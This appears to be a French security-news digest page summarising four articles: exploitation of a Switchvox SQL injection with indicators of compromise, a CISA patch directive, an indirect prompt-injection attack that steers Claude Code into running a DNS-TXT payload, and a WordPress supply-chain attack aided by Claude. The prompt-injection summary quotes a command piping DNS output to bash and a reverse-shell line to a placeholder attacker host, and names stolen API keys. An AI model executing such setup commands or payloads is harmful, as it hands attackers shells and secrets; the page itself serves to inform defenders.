Exploitation active de CVE-2026-9586 dans Sangoma Switchvox pour déployer des reverse shells

🔍 Contexte Source : BleepingComputer, publiĂ© le 2 septembre 2026. Des chercheurs de Horizon3 ont observĂ© l’exploitation active de CVE-2026-9586, une vulnĂ©rabilitĂ© critique d’injection SQL non authentifiĂ©e affectant la plateforme VoIP d’entreprise Sangoma Switchvox. đŸ› ïž DĂ©tails techniques de la vulnĂ©rabilitĂ© Endpoint vulnĂ©rable : /pa (HTTP), exposĂ© publiquement MĂ©canisme : Le champ PhoneIP extrait d’un message XML est directement concatĂ©nĂ© dans une requĂȘte SQL non paramĂ©trĂ©e Impact : Injection SQL menant Ă  l’exĂ©cution de commandes systĂšme (RCE) Exploitation : Via une requĂȘte XML craftĂ©e envoyĂ©e avec curl CVE-2026-9586 est la plus sĂ©vĂšre parmi 12 vulnĂ©rabilitĂ©s dĂ©couvertes par Horizon3 et signalĂ©es Ă  Sangoma le 10 avril Patch disponible : Switchvox version 8.4.0.2, publiĂ©e le 14 juillet 🚹 ActivitĂ© d’exploitation observĂ©e PremiĂšre exploitation dĂ©tectĂ©e par les honeypots Horizon3 le 30 aoĂ»t Adresse IP source unique : 176.65.148.184 Tentatives en succession rapide sur plusieurs systĂšmes SĂ©quence d’attaque : ExĂ©cution d’un payload initial Collecte des processus en cours d’exĂ©cution Transmission des donnĂ©es encodĂ©es en base64 vers un serveur distant Tentative d’établissement d’un reverse shell Environ 4 000 instances Switchvox exposĂ©es sur Internet (source : Shodan), majoritairement aux États-Unis 🔎 Indicateurs de compromission EntrĂ©es suspectes dans /var/log/switchvox/db-quirks.log Connexions rĂ©seau vers 176.65.148.184, notamment sur le port 39323 📋 Type d’article Article d’alerte de sĂ©curitĂ© et d’analyse technique, visant Ă  informer les administrateurs systĂšmes de l’exploitation active en cours et Ă  fournir des indicateurs de compromission exploitables. ...

4 septembre 2026 Â· 3 min

CISA ordonne la correction de 3 vulnérabilités activement exploitées : Langflow, N-central, Apache Tomcat

đŸ›Ąïž Contexte PubliĂ© le 5 aoĂ»t 2026 sur BleepingComputer, cet article rapporte une directive de la CISA (Cybersecurity and Infrastructure Security Agency) imposant aux agences fĂ©dĂ©rales amĂ©ricaines de remĂ©dier Ă  trois vulnĂ©rabilitĂ©s activement exploitĂ©es dans des produits largement dĂ©ployĂ©s, avec une Ă©chĂ©ance fixĂ©e au vendredi 7 aoĂ»t 2026. 🔮 VulnĂ©rabilitĂ©s concernĂ©es CVE-2026-9198 (IBM Langflow) — Score CVSS 9.8 (critique). Permet Ă  un attaquant non authentifiĂ© d’exĂ©cuter du code Ă  distance sur des dĂ©ploiements par dĂ©faut en chaĂźnant deux endpoints API pour contourner l’authentification. Des PoC publics fonctionnels ont Ă©mergĂ© fin juillet 2026. ...

8 aoĂ»t 2026 Â· 3 min

Injection de prompt indirecte via DNS TXT : compromission totale via Claude Code à l'ouverture d'un dépÎt

🔍 Contexte PubliĂ© le 25 juin 2026 par Andre Hall & Miller Engelbrecht sur le blog de 0DIN (plateforme de bug bounty IA de Mozilla), cet article prĂ©sente une dĂ©monstration technique d’une attaque par injection de prompt indirecte ciblant les outils de dĂ©veloppement agentiques, en particulier Claude Code d’Anthropic. ⚙ MĂ©canisme de l’attaque L’attaque repose sur trois composants enchaĂźnĂ©s, chacun individuellement bĂ©nin : Un dĂ©pĂŽt GitHub normal : un fichier README ou issue dĂ©crit une procĂ©dure d’initialisation standard (pip3 install -r requirements.txt puis python3 -m axiom init). Un package Python qui Ă©choue intentionnellement : le module axiom lĂšve une RuntimeError s’il n’est pas initialisĂ©, incitant l’agent Ă  exĂ©cuter python3 -m axiom init comme correction de routine. Un script d’initialisation qui rĂ©sout un enregistrement DNS TXT : scripts/setup.sh exĂ©cute dig +short TXT _axiom-config.m100.cloud @1.1.1.1 et passe le rĂ©sultat Ă  bash -c. L’enregistrement DNS contient un reverse shell encodĂ© en base64 (bash -i >& /dev/tcp/<attacker-host>/4443 0>&1). đŸ’„ Impact Shell interactif s’exĂ©cutant avec les droits de l’utilisateur dĂ©veloppeur Exfiltration de secrets d’environnement : ANTHROPIC_API_KEY, AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN PossibilitĂ© de persistance (clĂ© SSH, cron job, backdoor) Le payload est invisible : absent du dĂ©pĂŽt, non dĂ©tectable par les scanners statiques, jamais Ă©valuĂ© par l’agent avant exĂ©cution Le payload peut ĂȘtre modifiĂ© Ă  tout moment en Ă©ditant l’enregistrement DNS, sans aucun commit 🎯 Vecteur de diffusion Un simple lien vers le dĂ©pĂŽt partagĂ© dans une offre d’emploi, un tutoriel ou un message Slack suffit Ă  compromettre tout dĂ©veloppeur ouvrant le projet avec Claude Code. ...

29 juin 2026 Â· 3 min

Attaque supply-chain BuddyBoss : un acteur francophone utilise Claude pour compromettre 246 sites WordPress

🔍 Contexte PubliĂ© le 3 avril 2026 par Ctrl-Alt-Intel (ctrlaltintel.com), cet article de recherche dĂ©taille une attaque supply-chain contre l’écosystĂšme WordPress BuddyBoss / Caseproof, dĂ©couverte indĂ©pendamment le 18 mars 2026 par le chercheur @ice_wzl_cyber. L’attaque avait Ă©tĂ© signalĂ©e publiquement pour la premiĂšre fois par Cybernews le 24 mars 2026. 🎯 Vecteur d’attaque et dĂ©roulement L’acteur malveillant, identifiĂ© comme francophone, a utilisĂ© Claude Code (Anthropic) comme outil d’assistance tout au long de la chaĂźne d’attaque : ...

5 avril 2026 Â· 4 min
Derniùre mise à jour le: 22 septembre 2026 📝